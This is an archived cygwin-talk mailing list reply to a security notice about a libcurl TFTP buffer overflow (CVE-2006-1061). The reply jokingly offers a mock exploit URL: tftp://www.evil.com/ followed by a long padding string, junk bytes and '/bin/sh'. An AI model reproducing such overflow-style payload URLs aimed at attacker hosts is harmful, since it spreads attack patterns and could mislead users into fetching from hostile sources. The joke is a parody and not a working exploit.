This is the mail archive of the cygwin-talk mailing list for the cygwin project.


Index Nav: [Date Index] [Subject Index] [Author Index] [Thread Index]
Message Nav: [Date Prev] [Date Next] [Thread Prev] [Thread Next]
Other format: [Raw text]

RE: SECURITY: curl (CVE-2006-1061)


On 24 March 2006 02:26, Yaakov S (Cygwin Ports) wrote:

> libcurl is affected by a buffer overflow in the handling of URLs for
> the TFTP protocol, which could be exploited to compromise a user's
> system.
> 
> Solution: upgrade to 7.15.3.
> 
> More information:
> http://security.gentoo.org/glsa/glsa-200603-19.xml
> http://curl.haxx.se/docs/adv_20060320.html
> 
> 
> Yaakov


  New packages prepared - please upload from

tftp://www.evil.com/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAÂâÃÃÂÃÅÃÃÃÚÝÃÃÃ;|ÇAAA$%^()%$^&$"<V<YfassfaÂ$<Â7dfplphH$%^>h,.pf,hef%<ÇÂÂÂ$%>"Y52y54y2y92hj4522546844252e/bin/sh



;) muahahahahaaaaaa!

    cheers,
      DaveK
-- 
Can't think of a witty .sigline today....


Index Nav: [Date Index] [Subject Index] [Author Index] [Thread Index]
Message Nav: [Date Prev] [Date Next] [Thread Prev] [Thread Next]